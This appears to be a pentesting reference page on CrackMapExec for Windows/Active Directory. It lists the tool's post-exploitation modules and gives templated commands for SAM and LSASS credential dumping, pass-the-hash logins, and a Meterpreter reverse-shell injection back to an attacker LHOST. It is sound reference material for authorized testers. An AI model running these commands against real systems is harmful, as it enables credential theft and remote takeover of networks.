CrackMapExec
CrackMapExec
is a "Swiss army knife for pentesting Windows / Active Directory environments" that wraps around multiples Impacket
modules.
CrackMapExec
can be used to test credentials and execute commands through SMB
, WinRM
, MSSQL
, SSH
, HTTP
services.
Over SMB
, CrackMapExec
supports different command execution methods:
(Default)
wmiexec
executes commands viaWMI
smbexec
executes commands by creating and running a service, similarly to thePsExec
utilityatexec
executes commands by remotely scheduling a task with through the Windows task schedulermmcexec
executes commands over theMMC20.Application
DCOM
object
CrackMapExec
additionally supports authentication with Kerberos
tickets (specified in the KRB5CCNAME
environment variable) on Linux operating systems.
CrackMapExec installation
CrackMapExec
requires various Python dependencies (sometimes in specific version), making its installation somewhat challenging at times.
CrackMapExec
pre-compiled binaries for Linux and Windows (that still require Python3
to be installed on the system) can be downloaded on the CrackMapExec's GitHub repository's "Actions". Fully standalone binaries for Linux and Windows can be retrieved in the OffensivePythonPipeline.
For more information on CrackMapExec
's installation refer to the official documentation.
# As of March 2021, the crackmapexec package of the Kali Linux distribution is up to date and can be used to easily install CrackMapExec.
apt install crackmapexec
# Installation using Docker.
docker pull byt3bl33d3r/crackmapexec
docker run byt3bl33d3r/crackmapexec:latest [...]
CrackMapExec usage
# As of December 2018, crackmapexec does not provides an option to output to a file.
# The tee utility can be used to both display and store to a file the crackmapexec standard output.
# crackmapexec <[...]> | tee <OUTPUT_FILE>
# <TARGET | TARGETS> - can be IP(s), range(s), CIDR(s), hostname(s), FQDN(s) or file(s) containing a list of targets.
crackmapexec <smb | winrm | ssh | mssql | http> <TARGET | TARGETS> [-M <MODULE> [-o <MODULE_OPTION>]] (-d <DOMAIN> | --local-auth) -u <USERNAME | USERNAMES_FILE> (-p <PASSWORD | PASSWORDS_FILE> | -H <HASH>) [--sam] [-x <COMMAND> | -X <PS_COMMAND>]
# Kerberos authentication on Linux systems. The targets must be fully qualified hostnames (and not IP addresses) for the Kerberos authentication to work.
export KRB5CCNAME=<TICKET_CCACHE_FILE_PATH>
crackmapexec smb <TARGET | TARGETS> --kerberos [...]
Additionally, CrackMapExec
includes multiples modules that can be used for post-exploitation:
crackmapexec smb --list-modules
[*] Get-ComputerDetails Enumerates sysinfo
[*] bh_owned Set pwned computer as owned in Bloodhound
[*] bloodhound Executes the BloodHound recon script on the target and retreives the results to the attackers' machine
[*] empire_exec Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
[*] enum_avproducts Gathers information on all endpoint protection solutions installed on the the remote host(s) via WMI
[*] enum_chrome Decrypts saved Chrome passwords using Get-ChromeDump
[*] enum_dns Uses WMI to dump DNS from an AD DNS Server
[*] get_keystrokes Logs keys pressed, time and the active window
[*] get_netdomaincontroller Enumerates all domain controllers
[*] get_netrdpsession Enumerates all active RDP sessions
[*] get_timedscreenshot Takes screenshots at a regular interval
[*] gpp_autologin Searches the domain controller for registry.xml to find autologon information and returns the username and password.
[*] gpp_password Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
[*] invoke_sessiongopher Digs up saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using SessionGopher
[*] invoke_vnc Injects a VNC client in memory
[*] lsassy Dump lsass and parse the result remotely with lsassy
[*] met_inject Downloads the Meterpreter stager and injects it into memory
[*] mimikatz Dumps all logon credentials from memory
[*] mimikatz_enum_chrome Decrypts saved Chrome passwords using Mimikatz
[*] mimikatz_enum_vault_creds Decrypts saved credentials in Windows Vault/Credential Manager
[*] mimikittenz Executes Mimikittenz
[*] multirdp Patches terminal services in memory to allow multiple RDP users
[*] netripper Capture's credentials by using API hooking
[*] pe_inject Downloads the specified DLL/EXE and injects it into memory
[*] rdp Enables/Disables RDP
[*] rid_hijack Executes the RID hijacking persistence hook.
[*] scuffy Creates and dumps an arbitrary .scf file with the icon property containing a UNC path to the declared SMB server against all writeable shares
[*] shellcode_inject Downloads the specified raw shellcode and injects it into memory
[*] slinky Creates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in all shares with write permissions
[*] spider_plus List files on the target server (excluding `DIR` directories and `EXT` extensions) and save them to the `OUTPUT` directory if they are smaller then `SIZE`
[*] test_connection Pings a host
[*] tokens Enumerates available tokens
[*] uac Checks UAC status
[*] wdigest Creates/Deletes the 'UseLogonCredential' registry key enabling WDigest cred dumping on Windows >= 8.1
[*] web_delivery Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module
[*] wireless Get key of all wireless interfaces
CrackMapExec modules
CrackMapExec
notable modules usage:
# Authentication with a 1:1 mapping between the username and password / hashes files.
crackmapexec smb <DC_IP | TARGET> --continue-on-success --no-bruteforce -d '<DOMAIN>' -u <USERNAME_FILE> [-p <PASSWORD_FILE> | -H <HASH_FILE>
# SAM dump.
crackmapexec smb <TARGET | TARGETS> --sam (-d <DOMAIN> | --local-auth) -u <USERNAME> (-p <PASSWORD | PASSWORDS_FILE> | -H <HASH>)
# LSASS dump using lsassy.
crackmapexec smb <TARGET | TARGETS> -M lsassy (-d <DOMAIN> | --local-auth) -u <USERNAME> (-p <PASSWORD | PASSWORDS_FILE> | -H <HASH>)
# Outdated LSASS dump technique using mimikatz that is flagged by most antivirus products.
crackmapexec smb <TARGET | TARGETS> -M mimikatz (-d <DOMAIN> | --local-auth) -u <USERNAME> (-p <PASSWORD | PASSWORDS_FILE> | -H <HASH>)
# Meterpreter.
# msf > use multi/handler
# msf exploit(handler) > set payload windows/meterpreter/reverse_https
crackmapexec smb <TARGET | TARGETS> -M met_inject -o LHOST=<HOST> LPORT=<PORT> -d <DOMAIN> -u <USERNAME> (-p <PASSWORD | PASSWORDS_FILE> | -H <HASH>)
For more information on how to remotely extract credentials from the SAM
registry hive and the LSASS
process, refer to the [Windows] Post exploitation
note.
Note that:
The
--lsa
option dumps LSA secrets which can't be used inPass-the-Hash
attack and are harder to crack.The
<TARGET>
and<MODULE>
should be specified before the credentials as aCrackMapExec
bug could skip the targets / module otherwise.If the targeted host is unreachable,
CrackMapExec
may exit with out returning any error message.In case the metinject fails, a local administrator can be added for RDP access or a powershell reverse shell injected in memory instead (refer to the
[General] Shells - PowerShell
note).If a
permission denied
error is raised upon first execution ofcrackmapexec
on a Linux system, necessary rights to create new files in the user'sHOME
folder may be missing. A temporary alternativeHOME
folder can be specified forcrackmapexec
execution:HOME=<PATH> crackmapexec [...]
.
Last updated